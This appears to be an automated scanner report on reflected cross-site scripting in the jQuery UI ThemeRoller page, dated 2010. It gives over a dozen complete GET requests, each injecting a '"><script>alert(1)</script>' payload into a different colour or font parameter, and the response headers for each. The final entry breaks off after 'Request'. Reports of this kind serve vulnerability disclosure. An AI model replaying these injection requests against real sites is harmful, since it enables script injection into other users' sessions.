The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c309"><script>alert(1)</script>9ef676458d7 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=2222227c309"><script>alert(1)</script>9ef676458d7&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff5c6"><script>alert(1)</script>4bb9610b710 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000ff5c6"><script>alert(1)</script>4bb9610b710&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf44"><script>alert(1)</script>c36131bd0f6 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0acaf44"><script>alert(1)</script>c36131bd0f6&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a923"><script>alert(1)</script>0d310ed75a9 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff7a923"><script>alert(1)</script>0d310ed75a9&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5b78"><script>alert(1)</script>878fe90d931 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636f5b78"><script>alert(1)</script>878fe90d931&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1722"><script>alert(1)</script>3fa67dfb137 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74c1722"><script>alert(1)</script>3fa67dfb137&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40feb"><script>alert(1)</script>2127341874 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif40feb"><script>alert(1)</script>2127341874&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120127
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd562"><script>alert(1)</script>d38fcc48096 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12pxcd562"><script>alert(1)</script>d38fcc48096&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36130"><script>alert(1)</script>7eb2177a8ce was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold36130"><script>alert(1)</script>7eb2177a8ce&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120065
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9a1e"><script>alert(1)</script>1bc403df73c was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01e9a1e"><script>alert(1)</script>1bc403df73c&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad48"><script>alert(1)</script>c3cfabee311 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70fad48"><script>alert(1)</script>c3cfabee311&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5253d"><script>alert(1)</script>c643bd72dbb was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad5253d"><script>alert(1)</script>c643bd72dbb&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aadc9"><script>alert(1)</script>93993d12d9 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0aaadc9"><script>alert(1)</script>93993d12d9&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120127
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ce9"><script>alert(1)</script>9fcb678b763 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
